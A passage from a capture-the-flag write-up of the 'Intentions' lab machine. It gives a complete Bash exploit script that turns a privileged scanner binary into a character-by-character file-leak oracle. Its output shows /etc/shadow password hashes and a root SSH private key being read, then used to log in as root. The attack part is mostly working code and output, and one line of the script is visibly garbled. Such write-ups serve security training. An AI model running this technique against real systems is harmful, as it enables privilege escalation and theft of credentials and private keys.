brute.sh
#!/bin/bash
charset_ascii=' 0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz!"#$%&'\''()*+,-./:;<=>?@[\]^_`{|}~'$'\n'
bruteforce() {
local known="$1"
local file="$2"
local found_match=1
# Loop until no more matches are found
while (( found_match == 1 )); do
found_match=0
# Iterate over each character in the charset
for ((i = 0; i < ${#charset_ascii}; i++)); do
local char="${charset_ascii:i:1}"
local val="$known$char"
# Calculate MD5 hash of the value
local h=$(printf "%s" "$val" | md5sum | cut -d ' ' -f 1)
# Execute scanner with the calculated hash
local out=$(printf "/opt/scanner/scanner -c \"%s\" -s \"%s\" -l %d" "$file" "$h" ${#val} | xargs -I{} bash -c '{}')
# Check if the output contains "matches"
if [[ $out == *"matches"* ]]; then
printf '%s' "$char"
found_match=1
known="$val"
break
fi
done
done
printf '\n'
}
main() {
if [[ $#--ne-1-| -ne 1 ]]; then
echo "[+] usage: $0 filename"
exit 1
fi
local file="$1"
bruteforce '' "$file"
}
main "$@"It took some time for me to write this Bash script that exploit the scanner, /opt/scanner/scanner
I struggled quite a lot on processing special characters, especially the whitespace(' ') and newline(\n)
echo -n is a bad choice for such operation as the -n flag discards the newline character, so I opted out using printf
greg@intentions:~$ ./brute.sh /etc/shadow
root:$y$j9T$JjiD.nZgfr5ZSBdO4E9rY0$ZOElIJaX9F5qdpt54qFqtklDntYf/yo4kEUqqD/KFyA:19519:0:99999:7:::
daemon:*:19213:0:99999:7:::
bin:*:19213:0:99999:7:::
sys:*:19213:0:99999:7:::
sync:*:19213:0:99999:7:::
games:*:19213:0:99999:7:::
man:*:19213:0:99999:7:::
lp:*:19213:0:99999:7:::
mail:*:19213:0:99999:7:::
news:*:19213:0:99999:7:::
uucp:*:19213:0:99999:7:::
proxy:*:19213:0:99999:7:::
www-data:*:19213:0:99999:7:::
backup:*:19213:0:99999:7:::
list:*:19213:0:99999:7:::
irc:*:19213:0:99999:7:::
gnats:*:19213:0:99999:7:::
nobody:*:19213:0:99999:7:::
_apt:*:19213:0:99999:7:::
systemd-network:*:19213:0:99999:7:::
systemd-resolve:*:19213:0:99999:7:::
messagebus:*:19213:0:99999:7:::
systemd-timesync:*:19213:0:99999:7:::
pollinate:*:19213:0:99999:7:::
sshd:*:19213:0:99999:7:::
syslog:*:19213:0:99999:7:::
uuidd:*:19213:0:99999:7:::
tcpdump:*:19213:0:99999:7:::
tss:*:19213:0:99999:7:::
landscape:*:19213:0:99999:7:::
usbmux:*:19389:0:99999:7:::
steven:$y$j9T$TM/hbL/SRCyk67reQMC9C/$QHTiY3rtnGuQS1teQB7jrMys0eMkm7.tlnKFGrsoIa9:19391:0:99999:7:::
lxd:!:19389::::::
fwupd-refresh:*:19389:0:99999:7:::
mysql:!:19389:0:99999:7:::
ftp:*:19389:0:99999:7:::
greg:$y$j9T$/LxemPBd1ROuQOmQY7OJ0/$T7eTn0juiHsctWeX3GIOynHPuGKRiFMO1F.1zzPG696:19390:0:99999:7:::
legal:$y$j9T$Sl/k/bJVnQR85nLW6kAwj1$lmrMHlaVA9/xFczVtj92LsiLw7xpd4YYrmfJ7Yv37aD:19518:0:99999:7:::
_laurel:!:19527::::::It works well. Unfortunately, those system credential hashes are not crackable
greg@intentions:~$ ./brute.sh /home/steven/.ssh/id_rsa
panic: open /home/steven/.ssh/id_rsa: no such file or directory
[...REDACTED...]
greg@intentions:~$ ./brute.sh /home/steven/.ssh/authorized_keys
greg@intentions:~$ ./brute.sh /home/legal/.ssh/authorized_keys
panic: open /home/legal/.ssh/authorized_keys: no such file or directory
[...REDACTED...]
greg@intentions:~$ ./brute.sh /home/legal/.ssh/id_rsa
panic: open /home/legal/.ssh/id_rsa: no such file or directory
[...REDACTED...]I have checked the SSH directory of both the steven and legal user, and I was unable to find anything useful
greg@intentions:~$ ./brute.sh /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/…/htb/labs/intentions/scanner]
└─$ nano id_rsa.root
┌──(kali㉿kali)-[~/…/htb/labs/intentions/scanner]
└─$ chmod 600 id_rsa.root However, the private SSH key for the root user is present and I was able to extract it using the exploit script above
┌──(kali㉿kali)-[~/archive/htb/labs/intentions]
└─$ ssh root@$IP -i scanner/id_rsa.root
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-76-generic x86_64)
* documentation: https://help.ubuntu.com
* management: https://landscape.canonical.com
* support: https://ubuntu.com/advantage
system information as of thu jul 6 10:18:52 PM UTC 2023
system load: 0.11376953125
usage of /: 63.6% of 6.30GB
memory usage: 16%
swap usage: 0%
processes: 229
users logged in: 1
ipv4 address for eth0: 10.10.11.220
ipv6 address for eth0: dead:beef::250:56ff:feb9:5f29
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
12 additional security updates can be applied with ESM Apps.
learn more about enabling esm apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
root@intentions:~# whoami
root
root@intentions:~# hostname
intentions
root@intentions:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.220 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:5f29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:5f29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:5f:29 txqueuelen 1000 (Ethernet)
RX packets 936995 bytes 127783186 (127.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1127111 bytes 758239425 (758.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 13138 bytes 934710 (934.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13138 bytes 934710 (934.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise